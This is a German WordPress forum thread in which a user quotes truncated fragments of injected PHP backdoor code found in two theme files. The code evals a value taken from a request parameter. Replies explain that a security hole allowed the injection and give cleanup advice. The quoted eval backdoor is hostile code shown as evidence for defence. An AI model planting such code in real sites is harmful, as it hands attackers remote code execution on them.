• Hallo zusammen,
    Bekomme folgende Virus Warnung:

/themes/coller/inc/options-Framework.php
    .. .$sF[9].$sF[2]);if (isset(${$s20}['n2dd312'])) {eval($s21(${$s20}['n2dd312']));}?><?php

/themes/coller/image.php
    ... .$sF[9].$sF[2]);if (isset(${$s20}['nb450b2'])) {eval($s21(${$s20}['nb450b2']));}?><?php

Meine Frage,kann ich das einfach rauslöschen und gut oder was muss ich machen? Bzw. was genau bedeutet das?
    Bitte und Hofe um Hilfe

Vielen Dank

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• Das bedeutet dass dein System eine Lücke hatte oder hat(!), die jemand ausnutzt um Code zu injizieren. Kann über ein Plugin kommen (auch über ein deaktiviertes) oder oder.. Das gilt es herauszufinden.

• Prinzipiell sollte man in solchen Fällen die Seite erstmal in den Wartungsmodus nehmen und

- alle betroffenen Dateien von Schadecode säubern
    - prüfen wie der Schadcode auf den Server kommen konnte und die Lücke schließen

Du kannst den Code durchaus rauslöschen, solltest dir aber sicher sein, das du wirklich alle Dateien mit dem Code erwischt hast. Und natürlich kann ohne Schließen der Lücke jederzeit wieder Code aufgespielt werden :/

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!